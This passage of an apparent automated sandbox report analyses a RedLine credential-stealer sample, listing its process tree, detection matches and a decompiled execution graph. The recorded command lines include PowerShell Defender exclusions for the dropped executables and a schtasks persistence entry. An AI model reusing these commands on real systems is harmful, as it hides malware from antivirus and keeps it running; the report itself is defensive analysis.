                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 88%, ReversingLabs
                      • Detection: 58%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:8
                      Start time:14:22:08
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0x8d0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Imagebase:0x8d0000
                      File size:433'152 bytes
                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:11
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
                      Imagebase:0xbb0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:14:22:09
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:14:22:10
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0xcb0000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:15
                      Start time:14:22:10
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:16
                      Start time:14:22:11
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Imagebase:0xb00000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 88%, ReversingLabs
                      • Detection: 58%, Virustotal, Browse
                      Reputation:low
                      Has exited:true

                      Target ID:17
                      Start time:14:22:11
                      Start date:15/06/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:19
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Imagebase:0xbb0000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:20
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:21
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Imagebase:0xac0000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Target ID:22
                      Start time:14:22:18
                      Start date:15/06/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Reset < >

                        Execution Graph

                        Execution Coverage:10.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:8.3%
                        Total number of Nodes:1654
                        Total number of Limit Nodes:24
                        execution_graph 23993 18ba08 23994 18b9b1 23993->23994 23996 18bdd7 23994->23996 24022 18bb35 23996->24022 23998 18bde7 23999 18be68 23998->23999 24000 18be44 23998->24000 24003 18bee0 LoadLibraryExA 23999->24003 24004 18bf41 23999->24004 24006 18bf53 23999->24006 24017 18c00f 23999->24017 24001 18bd75 DloadReleaseSectionWriteAccess 8 API calls 24000->24001 24002 18be4f RaiseException 24001->24002 24018 18c03d 24002->24018 24003->24004 24005 18bef3 GetLastError 24003->24005 24004->24006 24010 18bf4c FreeLibrary 24004->24010 24007 18bf1c 24005->24007 24008 18bf06 24005->24008 24009 18bfb1 GetProcAddress 24006->24009 24006->24017 24011 18bd75 DloadReleaseSectionWriteAccess 8 API calls 24007->24011 24008->24004 24008->24007 24012 18bfc1 GetLastError 24009->24012 24009->24017 24010->24006 24013 18bf27 RaiseException 24011->24013 24014 18bfd4 24012->24014 24013->24018 24016 18bd75 DloadReleaseSectionWriteAccess 8 API calls 24014->24016 24014->24017 24019 18bff5 RaiseException 24016->24019 24033 18bd75 24017->24033 24018->23994 24020 18bb35 DloadAcquireSectionWriteAccess 8 API calls 24019->24020 24021 18c00c 24020->24021 24021->24017 24023 18bb41 24022->24023 24024 18bb67 24022->24024 24041 18bbde 24023->24041 24024->23998 24026 18bb46 24027 18bb62 24026->24027 24046 18bd07 24026->24046 24051 18bb68 GetModuleHandleW GetProcAddress GetProcAddress 24027->24051 24030 18bdcc 24030->23998 24031 18bdb0 24031->24030 24032 18bdc8 RtlReleaseSRWLockExclusive 24031->24032 24032->23998 24034 18bda9 24033->24034 24035 18bd87 24033->24035 24034->24018 24036 18bbde DloadAcquireSectionWriteAccess 4 API calls 24035->24036 24037 18bd8c 24036->24037 24038 18bda4 24037->24038 24039 18bd07 DloadProtectSection 3 API calls 24037->24039 24054 18bdab GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadAcquireSectionWriteAccess 24038->24054 24039->24038 24052 18bb68 GetModuleHandleW GetProcAddress GetProcAddress 24041->24052 24043 18bbe3 24044 18bbfb RtlAcquireSRWLockExclusive 24043->24044 24045 18bbff 24043->24045 24044->24026 24045->24026 24047 18bd1c DloadProtectSection 24046->24047 24048 18bd57 VirtualProtect 24047->24048 24049 18bd22 24047->24049 24053 18bc1d VirtualQuery GetSystemInfo 24047->24053 24048->24049 24049->24027 24051->24031 24052->24043 24053->24048 24054->24034 24055 18b88a 24056 18b78e 24055->24056 24057 18bdd7 ___delayLoadHelper2@8 17 API calls 24056->24057 24057->24056 24061 1735a0 24062 1735b9 24061->24062 24067 173cf0 24062->24067 24064 1735eb 24066 173cf0 111 API calls 24066->24064 24068 173d02 24067->24068 24072 173d15 24067->24072 24070 1735bd 24068->24070 24076 172fc0 109 API calls 24068->24076 24070->24066 24071 173d28 SetFilePointer 24071->24070 24073 173d44 GetLastError 24071->24073 24072->24070 24072->24071 24073->24070 24074 173d4e 24073->24074 24074->24070 24077 172fc0 109 API calls 24074->24077 24076->24072 24077->24070 24078 187860 24079 18786f __EH_prolog3_catch_GS 24078->24079 24334 171b78 24079->24334 24082 1881bb 24453 18a6f6 24082->24453 24083 1878a0 24087 187980 24083->24087 24088 1878b1 24083->24088 24130 1878bf 24083->24130 24090 187a10 24087->24090 24095 187996 24087->24095 24093 1878ba 24088->24093 24094 18795c 24088->24094 24344 171a16 24090->24344 24091 1881ea 24096 188203 GetDlgItem SendMessageW 24091->24096 24097 1881f3 SendDlgItemMessageW 24091->24097 24092 1881db SendMessageW 24092->24091 24102 177fca 53 API calls 24093->24102 24093->24130 24099 187975 EndDialog 24094->24099 24094->24130 24100 177fca 53 API calls 24095->24100 24472 175d94 24096->24472 24097->24096 24099->24130 24104 1879b3 SetDlgItemTextW 24100->24104 24106 1878ed 24102->24106 24109 1879bf 24104->24109 24105 188243 GetDlgItem 24110 188262 24105->24110 24496 17160a 29 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24106->24496 24107 187a2b EndDialog 24263 187a44 24107->24263 24108 187a61 GetDlgItem 24113 187a98 SetFocus 24108->24113 24114 187a75 SendMessageW SendMessageW 24108->24114 24117 1879c8 GetMessageW 24109->24117 24109->24130 24481 171b39 24110->24481 24118 187aa8 24113->24118 24119 187acf 24113->24119 24114->24113 24116 1878f4 24121 187904 24116->24121 24497 171b1b 24116->24497 24124 1879df IsDialogMessageW 24117->24124 24117->24130 24126 177fca 53 API calls 24118->24126 24520 171fa4 24119->24520 24120 18826c 24484 186357 GetClassNameW 24120->24484 24121->24130 24500 1716b3 26 API calls 24121->24500 24124->24109 24131 1879ee TranslateMessage DispatchMessageW 24124->24131 24125 18809a 24132 177fca 53 API calls 24125->24132 24133 187ab2 24126->24133 24501 18c426 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24130->24501 24131->24109 24138 1880ab SetDlgItemTextW 24132->24138 24502 1714a3 24133->24502 24134 171770 26 API calls 24134->24130 24142 1880c0 24138->24142 24140 18828a 24145 1882a6 24140->24145 24148 188caf 48 API calls 24140->24148 24141 187ae8 24146 177fca 53 API calls 24141->24146 24147 177fca 53 API calls 24142->24147 24150 1882d7 24145->24150 24154 177fca 53 API calls 24145->24154 24149 187aff 24146->24149 24151 1880de 24147->24151 24148->24145 24525 17a2ad 24149->24525 24160 188caf 48 API calls 24150->24160 24261 1883f0 24150->24261 24152 1714a3 28 API calls 24151->24152 24167 1880e7 24152->24167 24159 1882b9 SetDlgItemTextW 24154->24159 24157 1884f5 24170 18850d 24157->24170 24171 188500 EnableWindow 24157->24171 24163 177fca 53 API calls 24159->24163 24164 1882ed 24160->24164 24161 188155 24166 177fca 53 API calls 24161->24166 24162 18a4d2 21 API calls 24172 187b1b 24162->24172 24173 1882cd SetDlgItemTextW 24163->24173 24181 18830d 24164->24181 24212 18832e 24164->24212 24174 18815f 24166->24174 24167->24161 24175 1714a3 28 API calls 24167->24175 24168 187b40 24169 187b67 24168->24169 24529 17444f 24168->24529 24362 174235 24169->24362 24178 188528 24170->24178 24564 1719f8 GetDlgItem KiUserCallbackDispatcher 24170->24564 24171->24170 24179 171770 26 API calls 24172->24179 24173->24150 24182 1714a3 28 API calls 24174->24182 24183 188106 24175->24183 24176 1883dc 24185 188caf 48 API calls 24176->24185 24180 188550 24178->24180 24201 188548 SendMessageW 24178->24201 24189 187aca 24179->24189 24202 177fca 53 API calls 24180->24202 24180->24263 24560 185335 34 API calls __EH_prolog3_GS 24181->24560 24191 18816b 24182->24191 24194 177fca 53 API calls 24183->24194 24185->24261 24188 1884c0 24563 185335 34 API calls __EH_prolog3_GS 24188->24563 24358 171770 24189->24358 24207 1714a3 28 API calls 24191->24207 24192 18851f 24565 1719f8 GetDlgItem KiUserCallbackDispatcher 24192->24565 24203 188116 24194->24203 24196 187b80 GetLastError 24197 187b8b 24196->24197 24372 17665e 24197->24372 24201->24180 24209 188569 SetDlgItemTextW 24202->24209 24555 171170 28 API calls _wcslen 24203->24555 24204 187b61 24532 186a3a 25 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24204->24532 24205 187ba0 24213 187bac GetLastError 24205->24213 24214 187bbd 24205->24214 24206 1884e7 24215 171770 26 API calls 24206->24215 24216 188184 24207->24216 24208 1714a3 28 API calls 24208->24261 24209->24263 24212->24176 24218 188caf 48 API calls 24212->24218 24213->24214 24219 187c5d 24214->24219 24223 187bd9 GetTickCount 24214->24223 24224 187c6f 24214->24224 24220 1884f3 24215->24220 24229 171770 26 API calls 24216->24229 24217 188124 24556 1717b3 24217->24556 24222 188365 24218->24222 24219->24224 24225 187fa6 24219->24225 24220->24157 24221 177fca 53 API calls 24221->24261 24222->24176 24227 18836e DialogBoxParamW 24222->24227 24375 174085 24223->24375 24232 187ef4 24224->24232 24533 175eb3 24224->24533 24407 171b53 GetDlgItem ShowWindow 24225->24407 24227->24176 24234 18838c EndDialog 24227->24234 24237 1881a3 24229->24237 24232->24107 24551 175628 28 API calls _wcslen 24232->24551 24233 18813e 24241 171770 26 API calls 24233->24241 24234->24130 24235 1883a8 24234->24235 24235->24130 24561 1716b3 26 API calls 24235->24561 24243 171770 26 API calls 24237->24243 24238 187fbb 24408 171b53 GetDlgItem ShowWindow 24238->24408 24247 188149 24241->24247 24251 1881ae 24243->24251 24245 187f0e 24552 171170 28 API calls _wcslen 24245->24552 24246 187c99 24544 178bcf 114 API calls 24246->24544 24248 171770 26 API calls 24247->24248 24248->24161 24250 187bff 24257 171770 26 API calls 24250->24257 24258 171770 26 API calls 24251->24258 24252 187fc4 24409 177fca 24252->24409 24254 1717b3 28 API calls 24254->24261 24256 187cb1 24269 17a2ad 53 API calls 24256->24269 24262 187c0b 24257->24262 24258->24263 24260 187f24 24265 177fca 53 API calls 24260->24265 24261->24157 24261->24188 24261->24208 24261->24221 24261->24254 24266 171770 26 API calls 24261->24266 24562 171170 28 API calls _wcslen 24261->24562 24385 17338a 24262->24385 24263->24134 24268 187f34 24265->24268 24266->24261 24553 171170 28 API calls _wcslen 24268->24553 24283 187ce0 GetCommandLineW 24269->24283 24270 187fe2 SetDlgItemTextW GetDlgItem 24273 187fff GetWindowLongW SetWindowLongW 24270->24273 24274 188017 24270->24274 24273->24274 24414 188caf 24274->24414 24275 187f3f 24278 171770 26 API calls 24275->24278 24282 187f4a 24278->24282 24279 187c35 GetLastError 24280 187c40 24279->24280 24398 1732b8 24280->24398 24281 188025 24286 188caf 48 API calls 24281->24286 24287 171770 26 API calls 24282->24287 24291 187d65 _wcslen 24283->24291 24289 18802e 24286->24289 24290 187f56 24287->24290 24445 18abd8 24289->24445 24297 177fca 53 API calls 24290->24297 24545 187365 5 API calls 2 library calls 24291->24545 24293 171770 26 API calls 24293->24219 24295 187d83 24546 187365 5 API calls 2 library calls 24295->24546 24296 188040 24299 188caf 48 API calls 24296->24299 24300 187f6c 24297->24300 24308 18804f 24299->24308 24302 1714a3 28 API calls 24300->24302 24301 187d8f 24547 187365 5 API calls 2 library calls 24301->24547 24306 187f75 24302->24306 24304 188070 24554 1719f8 GetDlgItem KiUserCallbackDispatcher 24304->24554 24313 171770 26 API calls 24306->24313 24307 187d9b 24548 178c7e 114 API calls 24307->24548 24308->24304 24311 188caf 48 API calls 24308->24311 24309 187a55 24309->24107 24309->24125 24311->24304 24312 187dae 24549 18ad84 28 API calls __EH_prolog3 24312->24549 24315 187f91 24313->24315 24317 171770 26 API calls 24315->24317 24316 187dcb CreateFileMappingW 24318 187dfd MapViewOfFile 24316->24318 24319 187e35 ShellExecuteExW 24316->24319 24317->24107 24320 187e32 __InternalCxxFrameHandler 24318->24320 24321 187e53 24319->24321 24320->24319 24322 187e9d 24321->24322 24323 187e60 WaitForInputIdle 24321->24323 24326 187ec0 UnmapViewOfFile CloseHandle 24322->24326 24327 187ed3 24322->24327 24324 187e7e 24323->24324 24324->24322 24325 187e83 Sleep 24324->24325 24325->24322 24325->24324 24326->24327 24550 172962 26 API calls 24327->24550 24329 187edb 24330 171770 26 API calls 24329->24330 24331 187ee3 24330->24331 24332 171770 26 API calls 24331->24332 24333 187eee 24332->24333 24333->24232 24335 171bda 24334->24335 24338 171b81 24334->24338 24567 177b35 GetWindowLongW SetWindowLongW 24335->24567 24337 171be7 24337->24082 24337->24083 24337->24130 24338->24337 24566 177b5c 64 API calls 2 library calls 24338->24566 24340 171ba3 24340->24337 24341 171bb6 GetDlgItem 24340->24341 24341->24337 24342 171bc6 24341->24342 24342->24337 24343 171bcc SetWindowTextW 24342->24343 24343->24337 24568 18c468 24344->24568 24346 171a22 GetDlgItem 24347 171a51 24346->24347 24348 171a3f 24346->24348 24569 171a98 24347->24569 24349 1714a3 28 API calls 24348->24349 24351 171a4c 24349->24351 24352 171a81 24351->24352 24353 171770 26 API calls 24351->24353 24354 171a8e 24352->24354 24355 171770 26 API calls 24352->24355 24353->24352 24580 18c417 24354->24580 24355->24354 24357 171a95 24357->24107 24357->24108 24357->24309 24359 17177b 24358->24359 24360 17178a 24358->24360 24594 1712a3 26 API calls 24359->24594 24360->24168 24528 18ac95 26 API calls __EH_prolog3_GS 24360->24528 24368 174241 __EH_prolog3_GS 24362->24368 24363 18c417 5 API calls 24364 1742f8 24363->24364 24364->24196 24364->24197 24365 1742c6 24367 174740 54 API calls 24365->24367 24369 17424b 24365->24369 24367->24369 24368->24365 24368->24369 24371 171770 26 API calls 24368->24371 24595 171fd0 24368->24595 24602 174740 24368->24602 24369->24363 24371->24368 24373 17666a SetCurrentDirectoryW 24372->24373 24374 176668 24372->24374 24373->24205 24374->24373 24376 1740a9 24375->24376 24785 173f18 24376->24785 24379 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24380 1740c6 24379->24380 24381 186620 24380->24381 24382 186630 _wcslen 24381->24382 24789 174adf 24382->24789 24384 18663e 24384->24250 24387 173396 __EH_prolog3_GS 24385->24387 24386 1733e4 24389 1760a8 47 API calls 24386->24389 24396 17348e 24386->24396 24387->24386 24388 1733f9 CreateFileW 24387->24388 24388->24386 24390 173439 24389->24390 24392 17345e 24390->24392 24394 173446 24390->24394 24395 173449 CreateFileW 24390->24395 24391 18c417 5 API calls 24393 1734cf 24391->24393 24392->24396 24798 1716b3 26 API calls 24392->24798 24393->24279 24393->24280 24394->24395 24395->24392 24396->24391 24399 1732e9 24398->24399 24406 1732fa 24398->24406 24402 1732f5 24399->24402 24403 1732fc 24399->24403 24399->24406 24400 171770 26 API calls 24401 173309 24400->24401 24401->24293 24799 1734d2 24402->24799 24804 173340 24403->24804 24406->24400 24407->24238 24408->24252 24410 177fda 24409->24410 24825 177ffb 24410->24825 24413 171b53 GetDlgItem ShowWindow 24413->24270 24431 188cbe __EH_prolog3_GS 24414->24431 24416 18a3fa 24417 171770 26 API calls 24416->24417 24418 18a405 24417->24418 24419 18c417 5 API calls 24418->24419 24420 18a40a 24419->24420 24420->24281 24421 171fd0 45 API calls 24421->24431 24422 1757f6 26 API calls 24422->24431 24423 1714a3 28 API calls 24423->24431 24426 179c69 28 API calls 24426->24431 24429 171770 26 API calls 24429->24431 24431->24416 24431->24421 24431->24422 24431->24423 24431->24426 24431->24429 24432 18a439 __EH_prolog3_GS 24431->24432 24852 179adc 30 API calls 2 library calls 24431->24852 24853 186674 28 API calls 24431->24853 24854 17a251 CompareStringW 24431->24854 24855 18b29a 26 API calls 24431->24855 24856 18726a 28 API calls 24431->24856 24857 1729a7 45 API calls 24431->24857 24433 18a4ca 24432->24433 24858 175628 28 API calls _wcslen 24432->24858 24434 18c417 5 API calls 24433->24434 24435 18a4cf 24434->24435 24435->24281 24437 18a4a3 24859 171170 28 API calls _wcslen 24437->24859 24439 18a4b2 24440 1757f6 26 API calls 24439->24440 24441 18a4ba 24440->24441 24442 171770 26 API calls 24441->24442 24443 18a4c2 24442->24443 24444 171770 26 API calls 24443->24444 24444->24433 24446 18abe4 _wcslen __EH_prolog3_catch 24445->24446 24860 17a311 24446->24860 24448 18ac0b 24864 17225a 24448->24864 24452 18ac62 24452->24296 25451 185b76 24453->25451 24456 18a7e5 24458 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24456->24458 24457 18a71f GetWindow 24457->24456 24464 18a738 24457->24464 24459 1881c6 24458->24459 24459->24091 24459->24092 24460 18a745 GetClassNameW 25456 17bf3c CompareStringW 24460->25456 24462 18a769 GetWindowLongW 24463 18a7cd GetWindow 24462->24463 24465 18a779 SendMessageW 24462->24465 24463->24456 24463->24464 24464->24456 24464->24460 24464->24462 24464->24463 24465->24463 24466 18a78f GetObjectW 24465->24466 25457 185bb5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24466->25457 24468 18a7a6 25458 185b94 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24468->25458 25459 185faa 13 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24468->25459 24471 18a7b7 SendMessageW DeleteObject 24471->24463 25462 18c435 24472->25462 24474 175da0 GetCurrentDirectoryW 24475 175db2 24474->24475 24479 175dae 24474->24479 25463 1718cd 28 API calls 24475->25463 24477 175dc4 GetCurrentDirectoryW 24478 175de1 _wcslen 24477->24478 24478->24479 25464 1712a3 26 API calls 24478->25464 24479->24105 24482 171b45 SetWindowTextW 24481->24482 24483 171b43 24481->24483 24482->24120 24483->24482 24485 186382 24484->24485 24487 1863a7 24484->24487 25465 17bf3c CompareStringW 24485->25465 24489 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24487->24489 24488 186395 24488->24487 24490 186399 FindWindowExW 24488->24490 24491 1863c0 24489->24491 24490->24487 24492 186d92 24491->24492 24493 186d9e __EH_prolog3_catch 24492->24493 25466 18409d 24493->25466 24495 186db9 _wcslen 24495->24140 24496->24116 24498 171b27 SetDlgItemTextW 24497->24498 24499 171b25 24497->24499 24498->24121 24499->24498 24500->24130 24503 1714b9 _wcslen 24502->24503 24504 17122c 28 API calls 24503->24504 24505 1714c6 24504->24505 24506 18a4d2 24505->24506 24507 1875d8 5 API calls 24506->24507 24508 18a4ed GetDlgItem 24507->24508 24509 18a50c 24508->24509 24510 18a544 SendMessageW SendMessageW 24508->24510 24513 18a517 ShowWindow SendMessageW SendMessageW 24509->24513 24511 18a5a3 SendMessageW 24510->24511 24512 18a584 24510->24512 24514 18a5bb 24511->24514 24515 18a5bd SendMessageW SendMessageW 24511->24515 24512->24511 24513->24510 24514->24515 24516 18a5df SendMessageW 24515->24516 24517 18a602 SendMessageW 24515->24517 24516->24517 24518 18c3c4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24517->24518 24519 18a620 24518->24519 24519->24189 24521 171fbd 24520->24521 25508 171c91 24521->25508 24523 171fca 24524 18a44b 28 API calls __EH_prolog3_GS 24523->24524 24524->24141 25518 17a13a 24525->25518 24528->24168 25583 174461 24529->25583 24532->24169 24534 175ebf __EH_prolog3 24533->24534 24535 18c386 28 API calls 24534->24535 24538 175ec9 24535->24538 24536 175eeb GetModuleFileNameW 24537 175f1d 24536->24537 24536->24538 24539 1714a3 28 API calls 24537->24539 24538->24536 24538->24537 24540 171917 28 API calls 24538->24540 24541 175f26 24539->24541 24540->24538 24542 175f39 24541->24542 25596 1712a3 26 API calls 24541->25596 24542->24246 24544->24256 24545->24295 24546->24301 24547->24307 24548->24312 24549->24316 24550->24329 24551->24245 24552->24260 24553->24275 24554->24309 24555->24217 24557 1717f4 24556->24557 24559 1717c9 24556->24559 25597 17135d 28 API calls 24557->25597 24559->24233 24560->24212 24561->24176 24562->24261 24563->24206 24564->24192 24565->24178 24566->24340 24567->24337 24568->24346 24583 18c468 24569->24583 24571 171aa4 GetWindowTextLengthW 24584 1718cd 28 API calls 24571->24584 24573 171adf GetWindowTextW 24574 1714a3 28 API calls 24573->24574 24575 171afe 24574->24575 24576 171b11 24575->24576 24585 1712a3 26 API calls 24575->24585 24577 18c417 5 API calls 24576->24577 24579 171b18 24577->24579 24579->24351 24586 18c3c4 24580->24586 24582 18c421 24582->24582 24583->24571 24584->24573 24585->24576 24587 18c3cc 24586->24587 24588 18c3cd IsProcessorFeaturePresent 24586->24588 24587->24582 24590 18c6da 24588->24590 24593 18c69d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 24590->24593 24592 18c7bd 24592->24582 24593->24592 24594->24360 24596 172012 24595->24596 24598 171fec 24595->24598 24630 1729a7 45 API calls 24596->24630 24621 17122c 24598->24621 24601 17200c 24601->24368 24606 17474c __EH_prolog3_GS 24602->24606 24603 174780 24604 17444f 49 API calls 24603->24604 24607 17478c 24604->24607 24605 17476c CreateDirectoryW 24605->24603 24608 174821 24605->24608 24606->24603 24606->24605 24609 174834 GetLastError 24607->24609 24708 1760a8 24607->24708 24610 174830 24608->24610 24695 174a2f 24608->24695 24609->24610 24614 18c417 5 API calls 24610->24614 24616 174851 